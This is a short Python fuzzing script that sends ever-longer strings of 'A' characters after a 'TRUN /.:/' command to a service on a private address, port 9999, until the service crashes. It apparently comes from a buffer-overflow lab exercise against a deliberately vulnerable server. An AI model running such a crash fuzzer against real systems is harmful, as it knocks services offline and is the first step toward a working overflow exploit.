import sys, socket
from time import sleep

ADDR = "192.168.2.14"
PORT = 9999

buffer = "A" * 100

while True:
        try:
                s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                s.connect((ADDR, PORT))
                s.send(("TRUN /.:/" + buffer).encode())
                s.close
                sleep(1)
                print ("Characters sent:", (str(len(buffer))))
                buffer = buffer + "A" * 300

        except:
                print ("Buffer crashed at: ", (str(len(buffer))))
                sys.exit()
